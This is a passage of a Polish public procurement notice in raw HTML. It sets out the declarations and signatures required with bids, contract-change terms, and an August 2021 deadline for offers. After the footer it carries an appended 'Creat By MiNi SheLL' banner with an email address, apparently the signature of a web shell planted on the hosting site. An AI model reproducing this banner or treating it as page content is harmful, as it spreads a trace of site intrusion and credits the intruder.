złożenia/uzupełnienia).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wraz z ofertą należy złożyć:1. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o<br/>niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu,<br/>w zakresie wskazanym w rozdziale V SWZ - zgodnie z załącznikiem nr 2 do SWZ.<br/>Oświadczenia stanowią dowód potwierdzający brak podstaw wykluczenia oraz spełniania<br/>warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący<br/>wymagane przez Zamawiającego podmiotowe środki dowodowe, wskazane w<br/>SWZ.Oświadczenia składa się, pod rygorem nieważności, w formie elektronicznej (w postaci<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. Wykonawca w przypadku polegania<br/>na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby<br/>przedstawia wraz z oświadczeniem, o którym mowa wyżej, także oświadczenie<br/>podmiotuudostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu<br/>oraz odpowiednio spełniania warunków udziału w postępowaniu, w zakresie, w jakim<br/>Wykonawca powołuje się na jego zasoby (zgodnie z załącznikiem nr 3 do SWZ).2.<br/>Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o<br/>udzielenie zamówienia publicznego (jeśli dotyczy).Pełnomocnictwo przekazuje się w postaci<br/>elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisemosobistym. W przypadku, gdy pełnomocnictwo zostało wystawione w postaci<br/>papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego<br/>dokumentu, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w<br/>postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z pełnomocnictwem w<br/>postaci papierowej, może dokonać mocodawca (osoba/osoby wystawiające pełnomocnictwo)<br/>lub notariusz. 3. Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby, do oddania do<br/>dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów (o ile Wykonawca korzysta ze<br/>zdolnościinnych podmiotów na zasadach określonych w art. 118 ustawy).Zobowiązanie lub inny<br/>podmiotowy środek dowodowy w opisywanym zakresie, przekazuje się w postaci elektronicznej,<br/>i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym. W przypadku, gdy zobowiązanie (inny podmiotowy środek dowodowy) zostało<br/>wystawione w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe<br/>odwzorowanie tego dokumentu, opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisemzaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej, może dokonać podmiot udostępniający<br/>zasoby lub notariusz.4. Oświadczenie, o którym mowa w Rozdziale VI ust. 9 SWZ (Zamawiający<br/>dopuszcza złożenie tego oświadczenia na Formularzu ofertowym), z którego wynika, które<br/>roboty budowlane wykonają poszczególni wykonawcy - dotyczy tylko wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienie <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, zawiera załącznik nr 4 do SWZ (ze względna ograniczoną<br/>ilość znaków w ogłoszeniu).1.1. Zamawiający przewiduje możliwość zmian postanowień<br/>zawartej umowy (tzw. zmiany kontraktowe w oparciu o art. 455 ust. 1 pkt 1 ustawy) w stosunku<br/>do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami<br/>zawartymi w załączniku nr 4 do SWZ.1.2. Zmiana umowy może także nastąpić w przypadkach,o<br/>których mowa w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy.2. Przed zawarciem umowy należy<br/>dopełnić formalności, które zostały wskazane w Rozdziale XXIII SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy przetargowej https://zawiercie.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Nie dotyczy</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com